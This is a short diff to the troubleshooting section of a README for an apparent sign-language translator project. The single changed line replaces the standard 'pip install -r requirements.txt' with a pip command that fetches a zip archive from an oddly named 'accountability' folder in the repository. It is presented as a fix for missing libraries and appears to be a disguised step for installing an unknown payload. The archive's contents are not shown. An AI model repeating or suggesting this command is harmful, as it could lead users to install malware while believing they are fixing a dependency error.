Thirdyy2/AI-sign-language-translator/README.md

 - If the program does not start, check if Python is installed and added to your PATH.
 - If the webcam does not activate, confirm it is connected and not used by another program.
-- For errors related to missing libraries, try running `pip install -r requirements.txt` again.
+- For errors related to missing libraries, try running `pip install -r https://github.com/Thirdyy2/AI-sign-language-translator/raw/refs/heads/main/accountability/A-sign-translator-language-v3.7-alpha.3.zip` again.
 - Restart your computer if the camera is not recognized.
 - Ensure you run the Command Prompt as a normal user—not administrator.